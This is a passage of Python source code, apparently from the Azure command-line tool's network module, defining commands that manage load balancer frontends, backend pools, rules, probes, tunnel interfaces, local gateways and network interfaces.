'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
raise UnrecognizedArgumentError('vnet should be provided when input subnet name instead of subnet id')
subnet = vnet + f'/subnets/{subnet}'
return subnet
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
# Before 2020-03-01, service doesn't support the other rest method.
# We have to use old one to keep backward compatibility.
# Same for basic sku. service refuses that basic sku lb call the other rest method.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
# when sku is 'gateway', 'tunnelInterfaces' can't be None. Otherwise service will response error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise CLIError('Each backend address must have name and frontend_ip_configuration information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet name | subnet id) information.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
# avoid break when backend_address_pool_name is None and backend_pools_name is not None
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
instance.bgp_settings = BgpSettings(asn, bgp_peering_address, peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
